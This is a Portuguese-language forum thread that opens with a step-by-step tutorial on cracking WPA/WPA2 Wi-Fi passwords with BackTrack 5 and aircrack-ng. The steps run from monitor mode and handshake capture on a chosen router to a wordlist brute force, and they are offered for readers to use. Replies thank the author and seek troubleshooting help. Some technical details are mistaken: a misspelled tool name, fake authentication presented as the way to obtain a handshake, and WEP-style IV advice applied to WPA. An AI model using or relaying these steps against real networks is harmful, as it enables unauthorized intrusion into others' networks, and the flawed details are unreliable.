Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Como quebrar WPA

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Como quebrar WPA

    Salve Galera GH...tive uma matéria na facu. de segurança e resolvi mostrar a invasão em um roteador usando WPA/WPA2 usando o backtrack5 e resolvi compartilhar com vocês tambem
    OBS: verifique se sua placa de rede é compativel para fazer todo o procedimento
    (lembrando que não vou ensinar o que cada parâmetro o que faz)

    Para fazer o processo vamos precisar

    - backtrack 5
    -wordlist com suporte ao aircrack-ng


    primeiramente vamos aos comandos:

    Código:
    airmon-ng
    airmon-ng start wlan0
    airodump-ng mon0
    airodump-ng -c (canal) -w (file name) --bssid (MAC AP) mon0
    airplay-ng -1 0 -a (BSSID) mon0 
    aircrack-ng (File directory)
    aircrack-ng -w (wordlist directory) (File directory)
    Vamos agora passo-a-passo seguindo os códigos acima:


    começaremos com os dois primeiros comando:
    Código:
    airmon-ng
    aqui ele vai mostrar o nome da minha placa de rede e dar o nome de wlan0
    Código:
    airmon-ng start wlan0
    após esse comando ele coloca a placa em modo monitor e habilita o nome de mon0



    agora vamos ver as redes por perto com o comando:
    Código:
    airodump-ng mon0

    (Podemos ver o BSSID o canal e o MAC ( que vamos chamar de BSSID nos comandos de agora em diante) do roteador...por hora vamos gravar o endereço MAC e o canal)
    (Temos que observar que abaixo de STATION existe um endereço MAC que é o de alguem usando a rede...temos que lembrar que precisamos de pelo menos 1 endereço usando a rede, caso contrario não é possivel continuar)

    vamos começar a monitorar uma rede especifica e pegar pacotes
    Código:
    airodump-ng -c (canal) -w (file name) --bssid (MAC AP) mon0
    file name é o nome que você vai dar para o arquivo de captura criado com o parâmetro -w..
    (nomalmente esse arquivo é criado na pasta root com a extensão .cap)




    Agora vamos pedir uma autentificação com o comando
    airplay-ng -1 0 -a (BSSID) mon0

    como observado acima a autentificação foi aceita..

    agora podemos tentar crackear..então usaremos o comando
    aircrack-ng (file directory)

    se o resultado obtido for "WPA( 1 handshake) você pode continuar...caso ao contrario tente novamente com mais pacotes capturados

    para finalizar vamos tentar descrobrir a senha por brute force usando uma wordlist
    Código:
    aircrack-ng -w (wordlist directory) (File directory)



    descoberta a senha que no nosso caso é "password".... é só correr para o abraço



    Galera se eu tiver falado algo errado ou quiserem complementar fiquem a vontade!

    se eu tiver ajudado com esse tutorial... por favor agradeçam e comentem
    ________________

  • Font Size
    #2
    Muito show rike, parabens.

    Vou analizar e ver aonde é que eu errei.

    Póis eu segui vendo uma video aula( que não era bem explicado igual ao topico ).

    E então eu nunca conseguia terminar de baixar os packages.

    Vou refazer usando seu metodo.

    Obrigado por compartilhar.
    WhiteCollarGroup till I die
    MI5, MI6,NSA,FBI,Army, CIA,Navy,Air Force, Mossad, PF and all this shit can't stop me.

    Comment


    • Font Size
      #3
      valeu crypto...são pessoas que nem você que fazem a gente ter vontade de criar esses tópicos
      ________________

      Comment


      • Font Size
        #4
        Que eu saiba está área é sobre forense.

        Comment


        • Font Size
          #5
          Muito bem esplicado

          Comment


          • Font Size
            #6
            Postado Originalmente por #Franco Ver Post
            Que eu saiba está área é sobre forense.
            Franco, o post é valido e está na area correta.

            Aqui é forensics, e essa tecnica do tutorial é digital anti-forensics.

            Se encaixa na area.
            WhiteCollarGroup till I die
            MI5, MI6,NSA,FBI,Army, CIA,Navy,Air Force, Mossad, PF and all this shit can't stop me.

            Comment


            • Font Size
              #7
              Ah,desculpa minha ingnorância!

              Comment


              • Font Size
                #8
                Valeu, ótimo post.

                Tentei fazer aqui também, porém só capturo o handshake se minha wlan0 estiver conectada ao ap.

                Efetuei vários testes e deixei capturando pacotes por mais de uma hora. Não captura o handshake de forma nenhuma.

                Estou utilizando o BackTrack 5. E segundo o airmong-ng minha placa é compátivel, pois ele gera a mon0 perfeitamente.

                Tem alguma dica ?
                ---->profrxf<----

                Comment


                • Font Size
                  #9
                  Postado Originalmente por profrxf Ver Post
                  Valeu, ótimo post.

                  Tentei fazer aqui também, porém só capturo o handshake se minha wlan0 estiver conectada ao ap.

                  Efetuei vários testes e deixei capturando pacotes por mais de uma hora. Não captura o handshake de forma nenhuma.

                  Estou utilizando o BackTrack 5. E segundo o airmong-ng minha placa é compátivel, pois ele gera a mon0 perfeitamente.

                  Tem alguma dica ?
                  Não é só porque ele gera o mon0 que ele é compativel, algumas placas de rede não conseguem capturar os pacotes,outras não conseguem crackear e assim varia de placa para placa de rede

                  o mais importante não é a quantidade de pacote, mas a quantidade de IV's que ele pega...esse teste que eu fiz, demorou 2 dias capturando pacotes, somente uma hora é um tempo insignificante

                  PS: o nivel do sinal deve ser +/- 85% para mais
                  ________________

                  Comment


                  • Font Size
                    #10
                    Hi.

                    Primeira vez que clico num 'obrigado'.
                    Material muito bem ilustrado e explicado. Parabéns!

                    []'s
                    Desenvolvedor Perl, PHP, .NET (C#, VB.NET, ASP.NET), Java (J2EE), Shell Script, JavaScript/Ajax, C, amante de Linux e noob.

                    twitter | last.fm

                    Comment


                    • Font Size
                      #11
                      Postado Originalmente por fvox Ver Post
                      Hi.

                      Primeira vez que clico num 'obrigado'.
                      Material muito bem ilustrado e explicado. Parabéns!

                      []'s
                      Já que sou o primeiro que ganho um obrigado seu, me sinto honrado...obrigado mesmo galera
                      ________________

                      Comment


                      • Font Size
                        #12
                        Muito bem explicado

                        rike_GH disponibiliza a wordlist pra galera
                        sigpic



                        Comment


                        • Font Size
                          #13
                          Show de bola...
                          parabéns pelo tópico, bem esplicado e util de mais.
                          valeu.
                          Não Acha Estranha Essa Frase:
                          Eu Sou Hacker e Uso Windows XP!

                          Use Débian, Aprenda Slackware e Brinque Muito Com Back|Track


                          Fã ->Nickguitar.dll


                          Quer ajudar nossso fórum e não sabe como?
                          Então click na imagem e ajude-nos com os links off

                          Comment


                          • Font Size
                            #14
                            cara nao to conseguindo a autenticação nao ta dando alguem pode me ajuda ?

                            Comment


                            • Font Size
                              #15
                              wordlist pra quem pediu está nesse tópico

                              Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
                              ________________

                              Comment

                              X
                              Working...
                              X